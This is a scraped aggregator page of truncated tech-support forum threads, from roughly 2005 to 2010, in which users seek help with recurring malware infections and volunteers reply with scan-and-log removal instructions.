C:\WINNT ... Read more

Answer:Not sure what I have...but it keeps coming back

Welcome to the BleepingComputer Forums. Since it has been a few days since you scanned your computer with HijackThis, we will need a new HijackThis log. If you have not already downloaded Random's System Information Tool (RSIT), please download Random's System Information Tool (RSIT) by random/random which includes a HijackThis log and save it to your desktop. If you have RSIT already on your computer, please run it again. Double click on RSIT.exe to run RSIT. Click Continue at the disclaimer screen. Please post the contents of log.txt. Thank you for your patience.Please see Preparation Guide for use before posting about your potential Malware problem. If you have already posted this log at another forum or if you decide to seek help at another forum, please let us know. There is a shortage of helpers and taking the time of two volunteer helpers means that someone else may not be helped. Please post your HijackThis log as a reply to this thread and not as an attachment. I am always leery of opening attachments so I always request that HijackThis logs are to be posted as a reply to the thread. I do not think that you are attaching anything scary but others may do so. While we are working on your HijackThis log, please: Reply to this thread; do not start another! Do not make any changes on your computer during the cleaning process or download/add programs on your computer unless instructed to do so. Do not run any other tool until ... Read more

2 more replies
Relevance 49.2%

I have done everything to get rid of my recent popups including runings spybot, adaware, microsoft Antispyware, Norton and Pandascan both in regular mode and safe mode. THey keep on finding stuff, but after restarting, they still come back. I have also empties the TEMP folder and cookies and temporary Internet files. I have included a HIJACK this log, hopefully someone can help. thanks.

Logfile of HijackThis v1.99.1
Scan saved at 6:34:55 PM, on 6/17/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe
C:\Program Files\Common Files\AOL\TopSpeed\2.0\aoltsmon.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\PROGRA~1\NORTON~1\NORTON~3\GHOSTS~2.EXE
C:\PROGRA~1\NORTON~1\NORTON~2\SPEEDD~1\NOPDB.EXE
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\fxssvc.exe
C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe
C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
C:\WINDOWS\GWHotKey.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe... Read more

Answer:HJT Log because they keep coming back

16 more replies
Relevance 49.2%

okay, so yesterday i cleaned my pc with "malwarebytes anti-malware and there were like 11 viruses. then i scanned after t, none, so i get up this morning and scan my pc because everything is going SO SLOW! and now i got 10 viruses. can anyone please help? yesterday i had like 2 injections, 2 clickers, 2 malware.packs, and like 6 agents.
heres my log for yesterday: http://pastebin.com/panEZfVS
and heres todays: http://rhymingcolors.pastebin.com/G7gJ51nr
please help. 5 of those kinds ive never seen before :/ please comment below
 

Answer:they keep coming back >:(

8 more replies
Relevance 49.2%

I can't get rid of this crap - I've ran everything on here that people say. I have SAV installed and up to date, I have SpywareGuard installed, I have ran HJT, I've ran Ewido software, nothing can get rid of this - Everytime I clean everything while in Safe mode and reboot, Spywareguard immediately starts popups saying a BHO has been added (suchs as C:\WINDOWS\system32\wvuvspq.dll) - I click remove BHO, and it comes back over and over...

Someone please help - this has totally destroyed my computer...
 

Answer:Someone please help - These BHO's keep coming back!!

Closing duplicate thread. Please continue to reply here: http://forums.techguy.org/malware-removal-hijackthis-logs/648572-please-help-my-hijackthis-log.html
 

1 more replies
Relevance 49.2%
Question: Keeps coming back!

I thought I wiped it off already but it's back AGAIN! And my SpyBot S&D is missing all sorts of components so it's not working right and it's the only one that has found any. The Microsoft one found one and deleted it but SpyBot found 16 but only deleted 2 before running into problems. EliteBar is back also. Help again!
 

Answer:Keeps coming back!

- Run ALL the steps in this Sticky thread READ ME FIRST BEFORE ASKING FOR SUPPORT: Basic Spyware, Trojan And Virus RemovalMake sure you check version numbers and get all updates.

- Very Important: Make sure you tell us the results from running the tutorial...was anything found? Were you unable to complete any of the scans?...Were you unable to download any of the tools?...Did you do the on-line scans as suggested? etc.
After doing ALL of the above you still have a problem:

- Download HijackThis 1.99.1

- Unzip the hijackthis.exe file to a folder you create named C:\Program Files\HJT

- Do NOT run Hijack This from the Desktop, a temp folder, or a sub-folder of C:\Documents and Settings, or choose to run it directly from the downloaded ZIP file.

- Before running HijackThis: You must close each of the following:your web browser, e-mail client, instant messenger, and programs like notepad, wordpad, MS Word etc. And any other unnecessary running programs.

- Run HijackThis and save your log file.

- Post your log as an ATTACHMENT to your next message. (Do NOT copy/paste the log into your post).
 

3 more replies
Relevance 49.2%

Greetings everyone I need some help.

First off... I have followed all the proceedures listed on the READ ME thread that is asked and I STILL AM HAVING ISSUES.

I have Ad-Aware SE and with the VX add.

I have HiJackThis v1.99 and have followed the steps on that thread as well.

Here is the problem:

I run Ad-Aware everytime I log on, and even in safe mode. It finds beween 8 and 60 items. Mostly Malware and DataMiners. Then once I fix those I rescan and it comes up clean. However, I am still getting pop-ups, I have EnhanceMySearch, and when I log off and log back in... and re-run Ad-Aware I still have 8-60 items that show up and the same problem persists.

Can anyone help and point me in the right direction? It is a major annoyance. THANKS TO EVERYONE IN ADVANCE!!
 

Answer:It all just keeps coming back

Make sure you have HijackThis 1.99 and follow the guidelines on where to install it and how to post a log as an attachment. This is all covered in the sticky thread NO HIJACK THIS LOG FILES BEFORE READING THIS: HJT Tutorial & LOG File Posting

Now post a HijackThis log as an attachment to your message (Do not post the log inline). All running programs should be closed, including your web browser, e-mail. Close before running Hijack This!

To repeat: Do NOT run Hijack This from the Desktop, a temp folder, or a sub-folder of C:\Documents and Settings, or choose to run it directly from the downloaded ZIP file. Place it in its own folder, for example C:\Program Files\HJT
 

11 more replies
Relevance 49.2%

I'm the kind of person who just needs to turn UAC off. It's a great idea for the vast majority of regular users, though, so I'm not canning it, just asking some questions on how to actually turn it off so that it stays off.I'm using Windows 7 x64 on a laptop that's just on its own, no domain, no group policy etc.Anyway, I've got my UAC slider all the way down the bottom (and have rebooted), yet I still need to explicitly right-click and choose "Run as Administrator" if I need to run something as an administrator. (for example the command prompt, if I want to run "chkdsk c: /f" or "pskill explorer.exe" oruse ProcessExplorer and look at the threads in system processes orwhatever.) The thing is I want to run most of my stuff as administrator without the need to right-click each time. Just take a look at some of the crazy problems I see and need to work with: http://users.on.net/~MRIS/Problem_20090207_0701.mhtI know that I can tick "run as administrator" in the advanced tab for the shortcut that launches these as a work-around but I want it for all my sysinternals utilities, and there's lots of them. I'm also sick of clicking "show for all users" in things like task manager when I launch it via CTRL-SHIFT-ESC.There's a Group Policy setting in the registry named:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUAThat I think is responsible.However it always comes back andgets set... Read more

Answer:UAC keeps coming back on all by itself.


MRIS said:
How do I track how this is getting there?It turns out a file named "registry.pol" in this folder:C:\Windows\System32\GroupPolicy\Machine\was doing it.

15 more replies
Relevance 49.2%

Hello, after removing numerous malwares, str.sys keep coming back even though i removed it several times.Here's the log, thanks for your help.Logfile of Trend Micro HijackThis v2.0.2Scan saved at 8:22:19 PM, on 7/16/2009Platform: Windows Vista SP1 (WinNT 6.00.1905)MSIE: Internet Explorer v7.00 (7.00.6001.18000)Boot mode: NormalRunning processes:C:\Windows\system32\Dwm.exeC:\Windows\Explorer.EXEC:\Windows\system32\taskeng.exeC:\Program Files\Synaptics\SynTP\SynTPEnh.exeC:\Program Files\Toshiba\Utilities\KeNotify.exeC:\Program Files\Common Files\Symantec Shared\ccApp.exeC:\Program Files\Symantec AntiVirus\VPTray.exeC:\Windows\System32\hkcmd.exeC:\Windows\System32\igfxpers.exeC:\Program Files\QuickTime\QTTask.exeC:\Program Files\iTunes\iTunesHelper.exeC:\Program Files\Synaptics\SynTP\SynToshiba.exeC:\Windows\system32\igfxsrvc.exeC:\Windows\ehome\ehtray.exeC:\Program Files\Common Files\Nero\Lib\NMBgMonitor.exeC:\Windows\ehome\ehmsas.exeC:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Common Files\Nero\Lib\NMIndexStoreSvr.exeC:\Program Files\Symantec AntiVirus\DoScan.exeC:\Program Files\Synaptics\SynTP\SynTPHelper.exeC:\Program... Read more

Answer:Str.sys keep coming back, help!

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

2 more replies
Relevance 49.2%
Question: Keeps coming back

Ok guys not sure what I keep missing but the 020 line keeps coming back and changing it name.

I have ran CWS, ewido, Killbox ( and delete after reboot) VirtumundoBegone
Logfile of HijackThis v1.99.1
Scan saved at 11:25:30 AM, on 1/22/2006
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Sygate\SPF\smc.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\WINDOWS\system32\drivers\KodakCCS.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Hijack This\TrojanHunter 4.2\THGuard.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Hijack This\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.comcast.net/
O3 - Toolbar: AIM Search - {40D41A8B-D79B-43d7-99A7-9EE0F344C385} - C:\Program Files\AIM Toolbar\AIMBar.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [NvCplDae... Read more

Answer:Keeps coming back

10 more replies
Relevance 48.79%

I found a few suspicious files one day while i was clearing up files around in my hd. backupuser.exe_backupuser.exemydocuments.scrrecycled.scrwinzip.pifphoto.scrc:\windows\appatch\lsass.exec:\windows\appatch\crss.exec:\windows\appatch\smss.exec:\recycled.scrand a registry valuemachine\software\microsoft\windows NT\CurrentVersion\WinLogon\Userinit: Userinit.exe,C:\WINDOWS\AppPatch\smss.exe,C:\WINDOWS\AppPatch\lsass.exePrior to posting this thread I have attempted to remove such files + registery value but some of the files and the registry value keep coming back after each reboot. Namely,c:\windows\appatch\lsass.exec:\windows\appatch\crss.exec:\windows\appatch\smss.exec:\recycled.scrAfter exhausting all my options I have come to seek help in this forums.Hope I made the right choice Anyway,I have followed as per instructions from this post http://www.bleepingcomputer.com/forums/t/34773/preparation-guide-for-use-before-using-malware-removal-tools-and-requesting-help/but recieved an error regarding the step involving root repeal. Don't know if it affects the scan but just gonna highlight the error.Error - Invalid PE image foundAlrighty then, here comes the big wall of textDDS (Ver_09-10-26.01) - NTFSx86 Run by User at 14:27:22.70 on Thu 11/05/2009Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_15Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.3326.2248 [GMT 8:00]AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated) {17DDD097-36FF-435F-9E1B-52D... Read more

Answer:Infection that keeps coming back

Hi,Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.Please subscribe to this topic, if you haven't already. You can subscribe by clicking the Options box to the right of your topic title and selecting Track This Topic.

Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

Please reply to this post so I know you are there.The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.Once I receive a reply then I will return with your first instructions.Thanks

9 more replies
Relevance 48.79%

Hello. I first found Vundo on Saturday, April 11. I left my email client (Thunderbird) open for a few hours and came back to loads of popups. I tried calling Microsoft, and they assisted me with removal - or so I thought. Afterwards, I installed every Windows update, bought and installed Trend Micro's Internet Security Pro, and started scanning with Malwarebyte's Anti-Malware twice a day, at least. Every day since then I have found instances of Vundo (depending on which I use first, my Antivirus or MBAM). Each day it has a different name, too. It started out with Vundo.H, then Vundo.HGO, and today, I have Vundo.V. Finally, last night I ran a Kaspersky scan, and it found two files that I had never seen mentioned before - a trojan-downloader.Win32.fraudload.edj and packed.win32.Mondera.c. I can't locate these files, and neither can any of the other programs. Here are the requested files: DDS.txt and my Kaspersky log (041609KOS.txt), and the Attach.txt file. Thank you so much for your help.DDS (Ver_09-03-16.01) - NTFSx86 Run by Jen at 12:33:38.40 on Thu 04/16/2009Internet Explorer: 7.0.5730.11 BrowserJavaVersion: 1.6.0_11Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1022.443 [GMT -4:00]AV: Trend Micro Internet Security Pro *On-access scanning enabled* (Updated)FW: Trend Micro Personal Firewall *enabled*============== Running Processes ===============C:\WINDOWS\system32\Ati2evxx.exeC:\WINDOWS\system32\svchost -k DcomLaunchsvchost.exeC... Read more

Answer:Vundo Keeps Coming Back

Please download The Comedian.exe to your desktopDouble click the program to run it. It will only take around several minutes to run.It will do a series of tasks and tell you when each one is finished.You will be prompted to press any key after each stepWhen it is done it will close and exit itself automatically.You can delete The_Comedian.exe once it is finishedNEXTPlease download Malwarebytes' Anti-Malware from HERE or HERENote: If you already have Malwarebytes' Anti-Malware, just run and update it.. Then do a "Perform Full Scan"Double Click mbam-setup.exe to install the application.Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.If an update is found, it will download and install the latest version.Once the program has loaded, select "Perform Full Scan", then click Scan.The scan may take some time to finish,so please be patient.When the scan is complete, click OK, then Show Results to view the results.Make sure that everything is checked, and click Remove Selected.When disinfection is completed, a log will open in Notepad and you may be prompted to Restart.(See Extra Note)The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.Copy&Paste the entire report in your next reply.Extra Note:If MBAM encounters a file that is difficult to remove,you will be presented with 1 of 2 prompts,click OK to either and let MBAM proceed with the disinfec... Read more

21 more replies
Relevance 48.79%

help...somebody please.
I just removed, with david's help, quite a few spyware files/a toolbar, as well as hclean. Now i get a message saying its back. Not to mention none of my spyware removal programs/norton are functioning properly all of a sudden. Here is my current HJT log:

Logfile of HijackThis v1.99.1
Scan saved at 8:19:41 PM, on 9/1/2005
Platform: Windows XP (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\csrss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINNT\system32\LEXBCES.EXE
C:\WINNT\system32\spoolsv.exe
C:\WINNT\system32\LEXPPS.EXE
C:\WINNT\Explorer.EXE
C:\WINNT\System32\CTSvcCDA.EXE
C:\Program Files\ewido\security suite\ewidoctrl.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\Program Files\Norton AntiVirus\IWP\NPFMntor.exe
C:\WINNT\System32\nvsvc32.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINNT\System32\wdfmgr.exe
C:\WINNT\System32\MsPMSPSv.exe
C:\WINNT\System32\RunDll32.exe
C:\WINNT\System32\LXSUPMON.EXE
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\WINNT\System32\ctfmon.... Read more

Answer:Help Hclean Keeps Coming Back

blazingeingi - please continue in the first thread we were wworking on..........
Do not duplicate threads
David
 

2 more replies
Relevance 48.79%

I really need help. Whenever I scan with avast, it tells me there's a virus. I can't delete because it's being used by another program. So I got into safe mode and try to remove it. A while later after I deleted it and back into Windows, I scan again and it's back. It's always in the same place too:

C:\.....\Temporary Internet Files\Content.IE5\ZTNTM02A\movie[1]
HijackThis log

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 6:50:08 PM, on 10/7/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16512)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\brss01a.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\Rundll32.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.EXE
C:\Program Files\Windows Media Player\WMPNSCFG.exe
C:\Program Files\Internet ... Read more

Answer:Virus keeps coming back

Anyone?
 

1 more replies
Relevance 48.79%

Hi, I've had this problem for about a week now. Something seems to have gotten onto my computer. The main thing I notice is there is a program called brastk.exe that gets autorun on startup. There are also a number of startup entries in msconfig that reactivate even if I disable them. They are:
"rundll32" which runs a dll called drkly16j.dll
"dumprep 0 -u"
"brastk.exe"

If I delete brastk.exe or drkly16j.dll they just get recreated on the next boot. It appears that something besides a program is running at startup, possibly a service or a program running on shutdown. There is also something redirecting my google searches, and when I plug in my flash drive an autorun file gets created along with a file called system.exe.

EDIT: uh-oh, I just tried to run HJT and Spybot and neither will start! No error messages, just double clicking on the program and nothing happens.

Answer:Malware keeps coming back

Please download Malwarebytes Anti-Malware and save it to your desktop.Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan. If an update is found, the program will automatically update itself. Press the OK button to close that box and continue. If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install.On the Scanner tab:Make sure the "Perform Quick Scan" option is selected.Then click on the Scan button.If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button. The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results' to display all objects found".Click OK to close the message box and continue with the removal process.Back at the main Scanner screen, click on the Show Results button to see a list of any malware that was found.Make sure that e... Read more

8 more replies
Relevance 48.79%

For the fourth time in the past few months, I have been experiencing strange pop-ups blocking my use of various programs. Twice, my IT dept. attempted removal of the virus, which looks like a virus warning from McAfee but will not allow removal or the use of the programs it is blocking. This time around it was blocking my use of Internet Explorer and Outlook.

A screen popped up and each time I tried to open the programs it would log a warning in the screen. The screen showed options for removing the items logged, however it would not respond to clicking any of the options and would only go away if I closed it out completely. If I did close it, as soon as I attempted to open those programs again, the warning would reappear. This is nearly identical to the last two or three times I have experienced this, with a couple weeks in between occurences.

I rebooted several times and recieved a pop-up message from Windows saying "Windows has recovered from a serious error." The third time I rebooted, it actually allowed me to open these programs without the warning. The first two times it would not go away. This has happened a couple of times prior, where that message seemed to temporarily fix my issue.

Is this a real virus that is hidden in my computer? What can I do to remove it completely?

Answer:Virus that keeps coming back

Hello can you run an MBAm scan and post a log back .. Let's see what it may show.Next run MBAM (MalwareBytes):Please download Malwarebytes Anti-Malware and save it to your desktop.alternate download link 1alternate download link 2MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan.If an update is found, the program will automatically update itself. Press the OK button to close that box and continue.If you encounter any problems while downloading the definition updates, manually download them from here and just double-click on mbam-rules.exe to install.On the Scanner tab:Make sure the "Perform Quick Scan" option is selected.Then click on the Scan button.If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button. The scan will begin and "Scan in progress" will show at the top... Read more

7 more replies
Relevance 48.79%

Ok, so I scanned my computer with Avast and had some Trojan?s and avast got a lot of them out, although my Firefox Process runs at 100% after about 2 minutes of using the app. So I assume I have some sort of a virus, I scanned my comp with Malwarebytes and it found some and deleted then but other malware viruses keeps coming back. I also did spybot S&D it found cookies, online Bitdefender found IRC-Worm and some other generic Trj's it deleted them, it seems avast did not detect some that Betdefender did, RemoverIT Pro v4 detected lots and could not remove some(list is below), I have Vista 64bit so : RootRepeal screend didn't work. I did what the instructions told me to do and this is where I?m at. What I do most of the time when I have a virus that does not want to go away is I try safe mood scans or boot time scans, i do not have avast pro anymore so i can't do a boo time scan. Safe mood scan detected some of the following below
Avast
Sign of "JS:Downloader-FT [Trj]
Sign of "Win32:Malware-gen
Sign of "HTML:Framer-inf [Trj]
Sign of "Win32:VB-LLP [Trj]
Sign of "Win32:VB-LLP [Trj]
Sign of "JS:FakeAV-AX [Trj]"
Sign of "HTML:IFrame-CJ [Trj]"

These where sign's of the trj or malware, it seems to keep coming back so i can't find the main file infecting my pc. Also these things have got into my windows files.

Usually what i would do at this point would be to back up and reinstall windows, although i have an extra TB hard driv... Read more

Answer:malware and Trj's keep coming back

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.Thanks and again sorry for the delay.We Need to check for Rootkits with RootRepealDownload RootRepeal from the following location and save it to your desktop.

First Location
Second Location
Third Location

Open on your desktop.Click the tab.Click the button.Check all seven boxes: Push OkCheck the box for your main system drive (Usually C:), and press Ok.Allow RootRepeal to run a scan of your system. This may take some time.Once the scan completes, push the button. Save the log to your desktop, using a distinctive name, such as RootRepeal.txt. Include this repor... Read more

7 more replies
Relevance 48.79%

I have run spysweeper several times and have removed zestyfind.com Hijack and search.com exe and they keep coming back what do I do? How do I get rid of this stuff?
 

Answer:Help - Zestyfind Etc Keeps Coming Back

16 more replies
Relevance 48.79%

So there's obviously some virus on this computer that I'm not finding. I run malwarebytes and it says it cleans up Total Security from my computer, but then I reboot a couple of times and it's all back there again.

Can someone help me get this nasty thing off?

Thanks.

Answer:I keep cleaning it up and it keeps coming back

Hello and welcome to Bleeping Computer.Please subscribe to your topic so that you will be notified as soon as I post a reply, instead of you having to check the topic all of the time. This will allow you to get an email notification when I reply.To subscribe, go to your topic, and at the top right hand corner by your first post, click the Options button and then click Track this topic. The bullet the immediate notification bubble. Then press submit.Could you please post your Malwarebytes log for review? It can be found from the "Logs" tab in the program.

2 more replies
Relevance 48.79%

i use windows XP home edition, mozilla to browse

about a month ago someone else was using my laptop and a bunch of infections were detected by the free version of AVG. i removed all the selected infections then ran malwarebytes which detected some more things and removed them. after rebooting and running malwarebytes again my laptop seemed clean. however, every time i have run malwarebytes since then (about 3 times), there will be no objects detected. BUT, AVG will pop up and say there are infections on my computer. so today, suddenly a bunch of internet popups show up on my laptop and AVG also shows up with a bunch of infections. i'll list some of the trojans that have been detected by AVG.

Trojan horse Pakes.DDT
Virus found Win32/Heur
Trojan horse Downloader.Zlob_r.EX
Trojan horse SHeur2.YNO
Trojan horse Small.BHD
Trojan horse Pakes.DDT
Trojan horse SHeur2.ZZF
(then there were a bunch of tracking cookies detected by AVG)
Trojan horse Agent2.DZZ
Trojan horse Generic13.ADTY
Trojan horse Agent2.EJA
Trojan horse Downloader.Generic8.AHTY

Answer:trojan that keeps coming back?

Run scans with Super Antispyware free and MalwareBytes AntiMalware free.Links to download and instructions in link below.Be sure to update both programs after downloading, installing and before scanning.http://www.bleepingcomputer.com/forums/ind...t&p=1087935Follow the instructions and post the logs in your next reply.Note that Super Antispyware scan is best run in safe mode per instructions.

16 more replies
Relevance 48.79%

I've run into a relentless little piece of malware called AdAntiHS which I have not been able to get rid of in a friend's computer. There's barely any information on it from credible sources online. It digs its claws into the startup programs on Windows (running Windows 7) and won't let go. Not sure what kind of damage it's doing either.
 
I've disabled it from startup using msconfig, manually deleted it, and even ran MalwareBytes from a USB using Hiren's BootCD and removed it. But after restarting the computer it shows back up at C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup. I've also deleted keys in the registry associated with AdAntiHS but to no avail upon restarting the computer. 
 
I noticed that upon deleting AdAntiHS from startup, a commonstartup file is created at C:\Windows\pss. I deleted that too. There is a registry key of appcompatCache which I understand is more like a reference or history of programs that have executed on the computer. Those are the only registry keys I have not deleted that make mention of AdAntiHS.
 
So far, I installed BitDefender on the computer which manages to catch AdAntiHS everytime on startup, but even though I choose to delete the quarantined item, it comes back again on restart. So at best, I quarantine it on startup but I want to be able to permanently get rid of it.
 
Has anyone else encountered this piece of malware and been able to wipe it from their system?
 
Thanks in advance fo... Read more

More replies
Relevance 48.79%

Hi all, I'm at wit's end. My laptop (a Toshiba running XP) has one of the worst virus infections I've ever had to deal with. After at least 12 hours of researching, cleaning, rebooting, configuring and trying MalwareBytes, VIPRERESCUE, CrapCleaner, Spybot, BitDefender, and OTM by Oldtimer...the virus is still not gone.

I do know that I had several trojans, RootKit, Windows Antivirus Pro, and Protection System. MalawareBytes keeps finding threats and removing them every time I scan, but says that to completely remove all the files I have to reboot...and then the viruses apparently reinstall themselves upon rebooting. Immediately after rebooting I run another scan and it finds new files.

The problem HAS lessened, but I am still getting the Windows Antivirus Pro-type fake security warnings. The Protection System and Antivirus Pro files and folders are gone, but obviously something still remains because it hasn't stopped yet.

Protection System tried to add an entry to the registry before I closed for the last reboot, after it was 'wiped' by MalwareBytes, but Spybot caught it and I disallowed the change to the registry.

Could someone PLEASE help me finally root out where this thing is hiding so I can finally get rid of it for good?

Answer:Wiping it over and over and still coming back...HELP

Not sure why this was moved...I KNOW I'm infected, and with what...I just need help to get rid of it?!

I did run RootRepeal, and while I haven't taken any action yet, it found a hidden file in the system32\drivers folder called "hjgruitvogodyi.sys". It's in red in the list on RootRepeal, which makes me think it's a BAD thing...but I'm afraid to remove it without some kind of direction from someone who knows this stuff better than I do...

8 more replies
Relevance 48.79%

HJT for Check up
Ran adaware, ms antispyware beta, can't get to housecall or install wincritical updates.
I have a cd with sp2 which I will try to update.

Logfile of HijackThis v1.99.1
Scan saved at 12:11:35 AM, on 9/20/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Intel\Intel(R) Active Monitor\imontray.exe
